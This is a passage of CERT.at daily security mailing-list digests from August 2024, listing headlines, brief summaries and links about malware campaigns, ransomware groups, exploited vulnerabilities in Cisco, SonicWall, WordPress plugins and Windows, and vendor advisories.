∗∗∗ A malicious Pidgin plugin ∗∗∗
---------------------------------------------
The developers of the Pidgin chat program have announced that a malicious plugin had been listed on its third-party plugins list for over one month. This plugin included a key logger and could capture screenshots. It went unnoticed at the time that the plugin was not providing any source code and was only providing binaries for download. Going forward, we will be ..
---------------------------------------------
https://lwn.net/Articles/987320/
∗∗∗ WordPress GiveWP POP to RCE (CVE-2024-5932) ∗∗∗
---------------------------------------------
A few days ago, Wordfence published a blog post about a PHP Object Injection vulnerability affecting the popular WordPress Plugin GiveWP in all versions <= 3.14.1. Since the blog post contains only information about (a part) of the POP chain used, I decided to take a look and build a fully functional Remote Code Execution exploit. This post describes ..
---------------------------------------------
https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-59…
∗∗∗ 7777 Botnet – Insights into a Multi-Target Botnet ∗∗∗
---------------------------------------------
Our latest research, a collaboration between Bitsight TRACE & the security researcher Gi7w0rm, has uncovered additional details & information about the 7777 Botnet.
---------------------------------------------
https://www.bitsight.com/blog/7777-botnet-insights-multi-target-botnet
∗∗∗ NFC malware empties bank accounts ∗∗∗
---------------------------------------------
An attacker combines phishing and malware to present fake bank cards to ATMs and withdraw money via NFC. This was observed in the Czech Republic.
---------------------------------------------
https://heise.de/-9848256
=====================
= Vulnerabilities =
=====================
∗∗∗ Moodle: Remote Code Execution via Calculated Questions ∗∗∗
---------------------------------------------
Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
---------------------------------------------
https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/
∗∗∗ ZDI-24-1182: Linux Kernel Netfilter Conntrack Type Confusion Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1182/
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
https://lwn.net/Articles/987393/
=====================
= End-of-Day report =
=====================
Timeframe: Friday 23-08-2024 18:00 − Monday 26-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Stealthy sedexp Linux malware evaded detection for two years ∗∗∗
---------------------------------------------
A stealthy Linux malware named sedexp has been evading detection since 2022 by using a persistence technique not yet included in the MITRE ATT&CK framework.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/stealthy-sedexp-linux-malwar…
∗∗∗ BSI: Security review of Huawei remains a state secret ∗∗∗
---------------------------------------------
Because Germany's security interests are affected, the BSI is not disclosing its technical review of Huawei. Golem.de did at least succeed in having the classification re-examined.
---------------------------------------------
https://www.golem.de/news/bsi-pruefung-der-sicherheit-von-huawei-bleibt-ein…
∗∗∗ GDPR violation: Uber to pay a 290 million euro fine ∗∗∗
---------------------------------------------
The popular ride-hailing service is accused of having transferred sensitive driver data to the USA with inadequate protection for more than two years.
---------------------------------------------
https://www.golem.de/news/datenuebertragung-in-die-usa-uber-soll-290-millio…
∗∗∗ From Highly Obfuscated Batch File to XWorm and Redline, (Mon, Aug 26th) ∗∗∗
---------------------------------------------
If you follow my diaries, you probably already know that one of my favorite topics around malware is obfuscation. I'm often impressed by the crazy techniques attackers use to ..
---------------------------------------------
https://isc.sans.edu/diary/From+Highly+Obfuscated+Batch+File+to+XWorm+and+R…
∗∗∗ SonicWall Issues Critical Patch for Firewall Vulnerability Allowing Unauthorized Access ∗∗∗
---------------------------------------------
SonicWall has released security updates to address a critical flaw impacting its firewalls that, if successfully exploited, could grant malicious actors unauthorized access to the devices. The vulnerability, tracked as ..
---------------------------------------------
https://thehackernews.com/2024/08/sonicwall-issues-critical-patch-for.html
∗∗∗ Cisco calls for United Nations to revisit cyber-crime convention ∗∗∗
---------------------------------------------
Echoes human rights groups' concerns that it could suppress free speech and more. Networking giant Cisco has suggested the United Nations' first-ever convention against cyber-crime is dangerously flawed and should be revised before being put to a formal vote.
---------------------------------------------
https://www.theregister.com/2024/08/22/cisco_criticizes_un_cybercrime_conve…
∗∗∗ Post-Quantum Cryptography: Standards and Progress ∗∗∗
---------------------------------------------
The National Institute of Standards and Technology (NIST) just released three finalized standards for post-quantum cryptography (PQC) covering public key encapsulation and two forms of digital signatures. In progress since 2016, this achievement represents a major milestone towards standards development that will keep information on the Internet secure and confidential for many years to come.
---------------------------------------------
http://security.googleblog.com/2024/08/post-quantum-cryptography-standards.…
∗∗∗ Meta blocks WhatsApp accounts after hacker attacks ∗∗∗
---------------------------------------------
The Iranian hacker group APT42 was the target of this action.
---------------------------------------------
https://www.derstandard.at/story/3000000233708/meta-blockiert-whatsapp-kont…
∗∗∗ CISA Adds One Known Exploited Vulnerability to Catalog for Versa Networks Director ∗∗∗
---------------------------------------------
CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of ..
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/08/23/cisa-adds-one-known-expl…
∗∗∗ PEAKLIGHT: Decoding the Stealthy Memory-Only Malware ∗∗∗
---------------------------------------------
Mandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding…
=====================
= Vulnerabilities =
=====================
∗∗∗ Stable Channel Update for Desktop ∗∗∗
---------------------------------------------
http://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desk…
∗∗∗ WPS Office Security Update Advisory ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/82637/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 22-08-2024 18:00 − Friday 23-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Qilin ransomware now steals credentials from Chrome browsers ∗∗∗
---------------------------------------------
The Qilin ransomware group has been using a new tactic and deploys a custom stealer to steal account credentials stored in Google Chrome browser.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/qilin-ransomware-now-steals-…
∗∗∗ Hackers are exploiting critical bug in LiteSpeed Cache plugin ∗∗∗
---------------------------------------------
Hackers have already started to exploit the critical severity vulnerability that affects LiteSpeed Cache, a WordPress plugin used for accelerating response times, a day after technical details became public.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-criti…
∗∗∗ Ebola infection warning: university triggers needless panic with phishing test ∗∗∗
---------------------------------------------
Students and staff at UCSC received a false warning by e-mail about an Ebola infection on campus. The university's CISO has apologized.
---------------------------------------------
https://www.golem.de/news/warnung-vor-ebola-infektion-phishing-test-an-eine…
∗∗∗ Robot mowers and vacuums: Ecovacs will address spying vulnerabilities after all ∗∗∗
---------------------------------------------
Several Ecovacs robot mowers and vacuums can be taken over by attackers. At first the manufacturer did not want to patch at all, but now it has reversed course.
---------------------------------------------
https://www.golem.de/news/hersteller-lenkt-ein-ecovacs-arbeitet-nun-doch-an…
∗∗∗ WordPress Websites Used to Distribute ClearFake Trojan Malware ∗∗∗
---------------------------------------------
Unfortunately, scams are all over the place, and anybody who has surfed the web should know this. We’ve all gotten phishing emails, or redirected to questionable websites at some point or another. Being on your guard is an important posture to take online, and part of that is knowing how to identify threats, scams, or places you shouldn’t visit ..
---------------------------------------------
https://blog.sucuri.net/2024/08/wordpress-websites-used-to-distribute-clear…
∗∗∗ Chinese Hackers Exploit Zero-Day Cisco Switch Flaw to Gain System Control ∗∗∗
---------------------------------------------
Details have emerged about a China-nexus threat group's exploitation of a recently disclosed, now-patched security flaw in Cisco switches as a zero-day to seize control of the appliances and evade detection. The activity, attributed to Velvet Ant, was ..
---------------------------------------------
https://thehackernews.com/2024/08/chinese-hackers-exploit-zero-day-cisco.ht…
∗∗∗ Halliburton probes an issue disrupting business ops ∗∗∗
---------------------------------------------
What could the problem be? Reportedly, a cyberattack. American oil giant Halliburton is investigating an "issue," reportedly a cyberattack, that has disrupted some business operations and global networks.
---------------------------------------------
https://www.theregister.com/2024/08/22/halliburton_investigates_incident_am…
∗∗∗ Bling Libra’s Tactical Evolution: The Threat Actor Group Behind ShinyHunters Ransomware ∗∗∗
---------------------------------------------
We analyze a recent incident by Bling Libra, the group behind ShinyHunters ransomware as they shift from data theft to extortion, exploiting AWS credentials.
---------------------------------------------
https://unit42.paloaltonetworks.com/shinyhunters-ransomware-extortion/
∗∗∗ CrowdStrike Outage Timeline and Analysis ∗∗∗
---------------------------------------------
Bitsight's analysis of the CrowdStrike outage and timeline mysteries.
---------------------------------------------
https://www.bitsight.com/blog/crowdstrike-outage-timeline-and-analysis
∗∗∗ A Global Treaty to Fight Cybercrime—Without Combating Mercenary Spyware: Article by Kate Robertson in Lawfare ∗∗∗
---------------------------------------------
In an article for Lawfare, the Citizen Lab's senior research associate Kate Robertson analyzes how, in its current form, the draft treaty is poised "to become a vehicle for complicity in the global mercenary spy trade."
---------------------------------------------
https://citizenlab.ca/2024/08/a-global-treaty-to-fight-cybercrime-without-c…
=====================
= Vulnerabilities =
=====================
∗∗∗ SonicOS Improper Access Control Vulnerability ∗∗∗
---------------------------------------------
https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0015
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 21-08-2024 18:00 − Thursday 22-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Google fixes ninth Chrome zero-day exploited in attacks this year ∗∗∗
---------------------------------------------
Today, Google released a new Chrome emergency security update to patch a zero-day vulnerability, the ninth one tagged as exploited this year.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/google-fixes-tenth-actively-…
∗∗∗ U.S. charges Karakurt extortion gang’s “cold case” negotiator ∗∗∗
---------------------------------------------
A member of the Russian Karakurt ransomware group has been charged in the U.S. for money laundering, wire fraud, and extortion crimes.
---------------------------------------------
https://www.bleepingcomputer.com/news/legal/us-charges-karakurt-extortion-g…
∗∗∗ Deletion obligations and security gaps: fines for data protection violations are piling up ∗∗∗
---------------------------------------------
In Hamburg, more fine proceedings for data protection violations have already been concluded this year than in the whole calendar year 2023. The penalties are sometimes high.
---------------------------------------------
https://www.golem.de/news/loeschpflicht-und-sicherheitsluecken-bussgelder-w…
∗∗∗ Memory corruption vulnerabilities in Suricata and FreeRDP ∗∗∗
---------------------------------------------
While pentesting KasperskyOS-based Thin Client and IoT Secure Gateway, we found several vulnerabilities in the Suricata and FreeRDP open-source projects. We shared details on these vulnerabilities with the community along with our fuzzer.
---------------------------------------------
https://securelist.com/suricata-freerdp-memory-corruption/113489/
∗∗∗ Windows Security best practices for integrating and managing security tools ∗∗∗
---------------------------------------------
We examine the recent CrowdStrike outage and provide a technical overview of the root cause.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/07/27/windows-security-b…
∗∗∗ Understanding the ‘Morphology’ of Ransomware: A Deeper Dive ∗∗∗
---------------------------------------------
Ransomware isn't just about malware. It's about brands, trust, and the shifting allegiances of cybercriminals.
---------------------------------------------
https://www.securityweek.com/understanding-the-morphology-of-ransomware-a-d…
∗∗∗ Recall: Microsoft's controversial "surveillance" feature is coming back ∗∗∗
---------------------------------------------
After serious security concerns, the company says it has reworked the new AI feature.
---------------------------------------------
https://www.derstandard.at/story/3000000233374/recall-microsofts-umstritten…
∗∗∗ BLUUID: Firewallas, Diabetics, And… Bluetooth ∗∗∗
---------------------------------------------
Dive into the fascinating and overlooked realm of Bluetooth Low Energy (BTLE) security in GreyNoise Labs' latest blog post. Learn techniques for remote device identification, uncover vulnerabilities, and explore the broader implications for IoT and healthcare.
---------------------------------------------
https://www.greynoise.io/blog/bluuid-firewallas-diabetics-and-bluetooth
∗∗∗ PEAKLIGHT: Decoding the Stealthy Memory-Only Malware ∗∗∗
---------------------------------------------
Mandiant identified a new memory-only dropper using a complex, multi-stage infection process. This memory-only dropper decrypts and executes a PowerShell-based downloader. This PowerShell-based downloader is being tracked as PEAKLIGHT. Overview: Mandiant Managed Defense identified a memory-only dropper and downloader delivering ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/peaklight-decoding…
∗∗∗ Attackers can cripple Cisco's VoIP system Unified Communications Manager ∗∗∗
---------------------------------------------
Security vulnerabilities make attacks on several Cisco products possible. Updates are available.
---------------------------------------------
https://heise.de/-9843447
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Unified Communications Manager Denial of Service Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco Identity Services Engine REST API Blind SQL Injection Vulnerabilities ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco Identity Services Engine Sensitive Information Disclosure Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco Identity Services Engine Cross-Site Request Forgery Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco Unified Communications Manager Cross-Site Scripting Vulnerability ∗∗∗
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Atlassian Jira August 2024 Security Update Advisory ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/82562/
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 20-08-2024 18:00 − Wednesday 21-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ CrowdStrike unhappy with “shady commentary” from competitors after outage ∗∗∗
---------------------------------------------
Botched update leads to claims that competitors are "ambulance chasing."
---------------------------------------------
https://arstechnica.com/?p=2044431
∗∗∗ GitHub Enterprise Server vulnerable to critical auth bypass flaw ∗∗∗
---------------------------------------------
A critical vulnerability affecting multiple versions of GitHub Enterprise Server could be exploited to bypass authentication and enable an attacker to gain administrator privileges on the machine.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/github-enterprise-server-vul…
∗∗∗ Major chip company: cyberattack disrupts production at Microchip Technology ∗∗∗
---------------------------------------------
The chip manufacturer's production capacity is currently limited. The cause is a cyberattack whose extent is currently being investigated.
---------------------------------------------
https://www.golem.de/news/grosser-chipkonzern-cyberangriff-stoert-produktio…
∗∗∗ Safety problems: cargo bike scandal widens ∗∗∗
---------------------------------------------
Dutch consumer protection groups are investigating further cargo bike manufacturers because serious defects have occurred there as well.
---------------------------------------------
https://www.golem.de/news/sicherheitsprobleme-lastenrad-skandal-weitet-sich…
∗∗∗ Plane tracker FlightAware admits user passwords, SSNs exposed for years ∗∗∗
---------------------------------------------
Notification omits a number of key details. Popular flight-tracking app FlightAware has admitted that it was exposing a bunch of users' data for more than three years.
---------------------------------------------
https://www.theregister.com/2024/08/20/flightaware_data_exposure/
∗∗∗ An AWS Configuration Issue Could Expose Thousands of Web Apps ∗∗∗
---------------------------------------------
Amazon has updated its instructions for how customers should more securely implement AWS's traffic-routing service known as Application Load Balancer, but it's not clear everyone will get the memo.
---------------------------------------------
https://www.wired.com/story/aws-application-load-balancer-implementation-co…
∗∗∗ Teach a Man to Phish ∗∗∗
---------------------------------------------
I decided to give away all of my phishing secrets for free. I realized at some point that I have been giving away phishing secrets for years, but only to select individuals, and only one at a time. That method of knowledge dissemination is terribly inefficient! So here it is, I’ve written it down for you instead.
---------------------------------------------
https://posts.specterops.io/teach-a-man-to-phish-43528846e382
∗∗∗ CISA Adds Four Known Exploited Vulnerabilities to Catalog ∗∗∗
---------------------------------------------
CISA has added four new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/08/21/cisa-adds-four-known-exp…
∗∗∗ CPU security flaw Sinkclose: firmware update also for AMD's Ryzen 3000 ∗∗∗
---------------------------------------------
The CPU security vulnerability "Sinkclose" allows attackers to inject malicious code. Initially, no updates were planned for older CPUs.
---------------------------------------------
https://heise.de/-9842780
=====================
= Vulnerabilities =
=====================
∗∗∗ Unauthenticated information leak in Bosch IP cameras ∗∗∗
---------------------------------------------
BOSCH-SA-659648: A vulnerability was discovered in internal testing of Bosch IP cameras of families CPP13 and CPP14, that allows an unauthenticated attacker to retrieve video analytics event data. No video data is leaked through this vulnerability.
---------------------------------------------
https://psirt.bosch.com/security-advisories/bosch-sa-659648.html
∗∗∗ DSA-5752-1 dovecot - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00165.html
∗∗∗ [20240803] - Core - XSS in HTML Mail Templates ∗∗∗
---------------------------------------------
https://developer.joomla.org:443/security-centre/944-20240803-core-xss-in-h…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 19-08-2024 18:00 − Tuesday 20-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Windows driver zero-day exploited by Lazarus hackers to install rootkit ∗∗∗
---------------------------------------------
The notorious North Korean Lazarus hacking group exploited a zero-day flaw in the Windows AFD.sys driver to elevate privileges and install the FUDModule rootkit on targeted systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/windows-driver-zero-day-exp…
∗∗∗ Solar installations and the cloud: developer fears collapse of European power grids ∗∗∗
---------------------------------------------
Modern solar installations are often connected to the manufacturers' cloud services. A developer sees this as a major danger to our energy supply.
---------------------------------------------
https://www.golem.de/news/solaranlagen-und-die-cloud-entwickler-befuerchtet…
∗∗∗ Approach to mainframe penetration testing on z/OS ∗∗∗
---------------------------------------------
We explain how mainframes work, potential attack vectors, and what to focus on when pentesting such systems.
---------------------------------------------
https://securelist.com/zos-mainframe-pentesting/113427/
∗∗∗ Hacking Wireless Bicycle Shifters ∗∗∗
---------------------------------------------
This is yet another insecure Internet-of-things story, this one about wireless gear shifters for bicycles. These gear shifters are used in big-money professional bicycle races like the Tour de France, which provides an incentive to actually ..
---------------------------------------------
https://www.schneier.com/blog/archives/2024/08/hacking-wireless-bicycle-shi…
∗∗∗ Ransomware Victims Paid $460 Million in First Half of 2024 ∗∗∗
---------------------------------------------
Ransomware payments in H1 2024 totaled nearly $460 million and $1.58 billion have been stolen in cryptocurrency heists.
---------------------------------------------
https://www.securityweek.com/ransomware-victims-paid-460-million-in-first-h…
∗∗∗ Critical Flaw in Donation Plugin Exposed 100,000 WordPress Sites to Takeover ∗∗∗
---------------------------------------------
A critical vulnerability in the GiveWP WordPress plugin could be exploited for remote code execution and arbitrary file deletion.
---------------------------------------------
https://www.securityweek.com/critical-flaw-in-donation-plugin-exposed-10000…
∗∗∗ Navigating the Uncharted: A Framework for Attack Path Discovery ∗∗∗
---------------------------------------------
This is the second post in a series on Identity-Driven Offensive Tradecraft, which is also the focus of the new course we will launch in October. In the previous post, I asked, “How does one discover and abuse new attack paths?” To start answering ..
---------------------------------------------
https://posts.specterops.io/navigating-the-uncharted-a-framework-for-attack…
∗∗∗ Selling Ransomware Breaches: 4 Trends Spotted on the RAMP Forum ∗∗∗
---------------------------------------------
The sale and purchase of unauthorized access to compromised enterprise networks has become a linchpin for cybercriminal operations, particularly in facilitating ransomware attacks.
---------------------------------------------
https://www.rapid7.com/blog/post/2024/08/20/selling-ransomware-breaches-4-t…
∗∗∗ Challenges in Automating and Scaling Remote Vulnerability Detection ∗∗∗
---------------------------------------------
We cover investments that Bitsight is making to greatly scale out our vulnerability coverage in record time through automation.
---------------------------------------------
https://www.bitsight.com/blog/challenges-automating-and-scaling-remote-vuln…
∗∗∗ Austria's interior minister wants to spy on messengers ∗∗∗
---------------------------------------------
Austria's intelligence services are to receive more powers and be allowed to inject malware and use WLAN catchers. The governing party ÖVP has applied for this.
---------------------------------------------
https://heise.de/-9840256
∗∗∗ Software development: malicious code attacks on Jenkins servers observed ∗∗∗
---------------------------------------------
Attackers are currently exploiting a critical vulnerability in the Jenkins software system. Instances in Germany are also at risk.
---------------------------------------------
https://heise.de/-9840463
=====================
= Vulnerabilities =
=====================
∗∗∗ SolarWinds Product Security Update Advisory (CVE-2024-28986) ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/82529/
∗∗∗ Intel Family Security Update Advisory ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/82531/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Friday 16-08-2024 18:00 − Monday 19-08-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Retrospective: Windows and the TCP/IP vulnerability CVE-2024-38063 ∗∗∗
---------------------------------------------
On 13 August 2024 the 0-day vulnerability CVE-2024-38063 in Windows became public. It is a remote code execution vulnerability in the Windows TCP/IP implementation. Attackers can compromise a host via IPv6 packets and execute code on it. Because of the rating with a CVSSv3 score of 9.8 (critical, "Exploitation More Likely"), Redmond currently recommends that administrators disable IPv6, but has also provided security updates for Windows. Administrators should therefore act.
---------------------------------------------
https://www.borncity.com/blog/2024/08/16/nachbetrachtung-windows-und-die-tc…
∗∗∗ Technical Analysis: CVE-2024-38021 ∗∗∗
---------------------------------------------
Recently, Morphisec researchers discovered a vulnerability in Microsoft Outlook that can lead to remote code execution (RCE). This vulnerability, identified as CVE-2024-38021, highlights a significant security flaw within the Microsoft Outlook application, potentially allowing attackers to execute arbitrary code without requiring prior authentication.
---------------------------------------------
https://blog.morphisec.com/technical-analysis-cve-2024-38021
∗∗∗ New Mad Liberator gang uses fake Windows update screen to hide data theft ∗∗∗
---------------------------------------------
A new data extortion group tracked as Mad Liberator is targeting AnyDesk users and runs a fake Microsoft Windows update screen to distract while exfiltrating data from the target device. [..] It is unclear how the threat actor selects its targets but one theory, although yet to be proven, is that Mad Liberator tries potential addresses (AnyDesk connection IDs) until someone accepts the connection request.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-mad-liberator-gang-uses-…
∗∗∗ Chrome will redact credit cards, passwords when you share Android screen ∗∗∗
---------------------------------------------
While the flag doesn't work at the moment, it is supposed to hide sensitive form fields present on the page by redacting the entire screen. It's unclear when the feature will be rolled out to everyone in Chrome for Android, but you'll be able to try the feature in Chrome Canary in the next few weeks.
---------------------------------------------
https://www.bleepingcomputer.com/news/google/chrome-will-redact-credit-card…
∗∗∗ AMD backs down: Ryzen 3000 will get a patch against the Sinkclose vulnerability after all ∗∗∗
---------------------------------------------
Originally AMD did not want to patch Ryzen 3000 CPUs against the Sinkclose vulnerability. After plenty of displeasure in the community, the company has now reversed course.
---------------------------------------------
https://www.golem.de/news/amd-knickt-ein-ryzen-3000-erhaelt-nun-doch-patch-…
∗∗∗ Improving network security: monitoring client communication with Velociraptor ∗∗∗
---------------------------------------------
SEC Defence, the managed incident response unit of SEC Consult, has developed a set of Velociraptor artifacts that make it possible to monitor current network communication on registered clients and to alert on specific connections, e.g. to known malicious IP addresses or connections created by known malicious processes.
---------------------------------------------
https://sec-consult.com/de/blog/detail/verbesserung-der-netzwerksicherheit-…
∗∗∗ Xeon Sender Tool Exploits Cloud APIs for Large-Scale SMS Phishing Attacks ∗∗∗
---------------------------------------------
Malicious actors are using a cloud attack tool named Xeon Sender to conduct SMS phishing and spam campaigns on a large scale by abusing legitimate services. "Attackers can use Xeon to send messages through multiple software-as-a-service (SaaS) providers using valid credentials for the service providers," SentinelOne security researcher Alex Delamotte said in a report shared with The Hacker News.
---------------------------------------------
https://thehackernews.com/2024/08/xeon-sender-tool-exploits-cloud-apis.html
∗∗∗ Microsoft Azure: MFA mandatory for administrators from 15 October 2024, but a "deferral" is possible ∗∗∗
---------------------------------------------
Microsoft has just announced in the M365 admin message center that from 15.10.2024 Azure will require administrators to authenticate via MFA. Redmond does, however, grant administrators the option of deferring this obligation by a total of 5 months.
---------------------------------------------
https://www.borncity.com/blog/2024/08/17/microsoft-azure-ab-15-oktober-2024…
∗∗∗ Unmasking Styx Stealer: How a Hacker’s Slip Led to an Intelligence Treasure Trove ∗∗∗
---------------------------------------------
The case of Styx Stealer is a compelling example of how even sophisticated cybercriminal operations can slip up due to basic security oversights. The creator of Styx Stealer revealed his personal details, including Telegram accounts, emails, and contacts, by debugging the stealer on his own computer with a Telegram bot token provided by a customer involved in the Agent Tesla campaign. This critical OpSec failure not only compromised his anonymity but also provided valuable intelligence about other cybercriminals, including the originator of the Agent Tesla campaign.
---------------------------------------------
https://research.checkpoint.com/2024/unmasking-styx-stealer-how-a-hackers-s…
∗∗∗ "WireServing" Up Credentials: Escalating Privileges in Azure Kubernetes Services ∗∗∗
---------------------------------------------
Mandiant disclosed this vulnerability to Microsoft via the MSRC vulnerability disclosure program, and Microsoft has fixed the underlying issue. [..] Adopting a process to create restrictive NetworkPolicies that allow access only to required services prevents this entire attack class. Privilege escalation via an undocumented service is prevented when the service cannot be accessed at all.
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/escalating-privile…
∗∗∗ Report: Pixel phones shipped with hidden but inactive remote-maintenance software ∗∗∗
---------------------------------------------
Pixel smartphones were shipped with remote-maintenance software at Verizon's request. When activated, it can download insecure code.
---------------------------------------------
https://heise.de/-9836726
∗∗∗ Patch now! Malicious-code attacks on SolarWinds Web Help Desk observed ∗∗∗
---------------------------------------------
Attackers are currently exploiting a critical vulnerability in SolarWinds Web Help Desk. A security patch is available, but can sometimes cause problems.
---------------------------------------------
https://heise.de/-9838566
∗∗∗ SIM swapping remains a marginal phenomenon in Germany ∗∗∗
---------------------------------------------
Numerous media outlets warn of damage caused by SIM swapping. In Germany, however, this fraud scheme remains rare.
---------------------------------------------
https://heise.de/-9839531
=====================
= Vulnerabilities =
=====================
∗∗∗ Multiple security vulnerabilities in IDOL2 (uciIDOL) ∗∗∗
---------------------------------------------
Five severe security vulnerabilities were identified in the time-tracking software IDOL2 (uciIDOL). They make it possible to completely compromise the encrypted communication between client and server. They also allow remote code execution on both the client and the server side.
---------------------------------------------
https://www.syss.de/pentest-blog/mehrere-sicherheitsschwachstellen-in-idol-…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (python-asyncssh), Fedora (bind, bind-dyndb-ldap, httpd, and tor), SUSE (cosign, cpio, curl, expat, java-11-openjdk, ncurses, netty, netty-tcnative, opera, python-Django, python-Pillow, shadow, sudo, and wpa_supplicant), and Ubuntu (firefox).
---------------------------------------------
https://lwn.net/Articles/986225/
∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2024-0004 ∗∗∗
---------------------------------------------
https://webkitgtk.org/security/WSA-2024-0004.html
∗∗∗ F5: K000140732: BIND vulnerability CVE-2024-1737 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000140732
∗∗∗ Kubernetes: CVE-2024-7646 ∗∗∗
---------------------------------------------
https://github.com/kubernetes/kubernetes/issues/126744
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 14-08-2024 18:00 − Friday 16-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Opinion: More layers in malware campaigns are not a sign of sophistication ∗∗∗
---------------------------------------------
Ten infection and protection layers to deploy malware sounds impressive and very hard to deal with. However, adding more layers counterintuitively does the opposite for antivirus evasion and is not a sign of sophistication. Why is that so?
---------------------------------------------
https://www.gdatasoftware.com/blog/2024/08/37995-malware-sophistication
∗∗∗ Ailurophile: New Infostealer sighted in the wild ∗∗∗
---------------------------------------------
We discovered a new stealer in the wild called "Ailurophile Stealer”. The stealer is coded in PHP and the source code indicates potential Vietnamese origins. It is available for purchase through a subscription model via its own webpage. Through the ..
---------------------------------------------
https://www.gdatasoftware.com/blog/2024/08/38005-ailurophile-infostealer
∗∗∗ Tusk: unraveling a complex infostealer campaign ∗∗∗
---------------------------------------------
Kaspersky researchers discovered the Tusk campaign, with ongoing activity that uses the Danabot and StealC infostealers and clippers to obtain cryptowallet credentials and system data.
---------------------------------------------
https://securelist.com/tusk-infostealers-campaign/113367/
∗∗∗ PrestaShop GTAG Websocket Skimmer ∗∗∗
---------------------------------------------
During a recent investigation we uncovered another credit card skimmer leveraging a web socket connection to steal credit card details from an infected PrestaShop website. While PrestaShop is not the most popular eCommerce solution for online stores, it is still in the top 10 most common ecommerce platforms in use on the web, and clocks in at just ..
---------------------------------------------
https://blog.sucuri.net/2024/08/prestashop-gtag-websocket-skimmer.html
∗∗∗ Ransomware Attacks on Industrial Firms Surged in Q2 2024 ∗∗∗
---------------------------------------------
Dragos has seen a significant increase in ransomware attacks on industrial organizations in Q2 2024 compared to the previous quarter.
---------------------------------------------
https://www.securityweek.com/ransomware-attacks-on-industrial-firms-surged-…
∗∗∗ Leaked Environment Variables Allow Large-Scale Extortion Operation of Cloud Environments ∗∗∗
---------------------------------------------
We recount an extensive cloud extortion campaign leveraging exposed .env files of at least 110k domains to compromise organizations' AWS environments.
---------------------------------------------
https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
∗∗∗ New infostealer targets macOS devices, appears to have Russian links ∗∗∗
---------------------------------------------
Researchers have discovered new information-stealing malware labeled Banshee Stealer that is designed to breach Apple computers.
---------------------------------------------
https://therecord.media/apple-macos-infostealer-banshee-stealer
∗∗∗ Iranian backed group steps up phishing campaigns against Israel, U.S. ∗∗∗
---------------------------------------------
Google’s Threat Analysis Group shares insights on APT42, an Iranian government-backed threat actor.
---------------------------------------------
https://blog.google/threat-analysis-group/iranian-backed-group-steps-up-phi…
∗∗∗ Ransomware Prevention Guide for Managed Service Providers ∗∗∗
---------------------------------------------
This comprehensive ransomware prevention guide outlines a strategic approach to preventing ransomware attacks, drawing upon industry best practices, compelling statistics, and expert insights.
---------------------------------------------
https://www.emsisoft.com/en/blog/45911/ransomware-prevention-guide-for-mana…
∗∗∗ Hacking Beyond.com — Enumerating Private TLDs ∗∗∗
